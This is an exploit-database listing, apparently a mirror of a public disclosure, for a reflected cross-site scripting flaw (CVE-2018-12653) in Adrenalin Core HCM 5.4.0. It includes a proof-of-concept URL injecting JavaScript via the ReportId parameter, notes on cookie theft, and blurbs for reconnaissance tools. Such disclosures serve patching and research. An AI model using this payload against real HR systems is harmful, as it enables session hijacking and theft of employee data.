Search for hundreds of thousands of exploits

"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting"

Author

Exploit author

Cy83rl0gger

Platform

Exploit platform

aspx

Release date

Exploit published date

2019-11-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.

URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0

Parameter
====================
ReportId

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html

Discoverer
====================
Rishu Ranjan
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47643/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.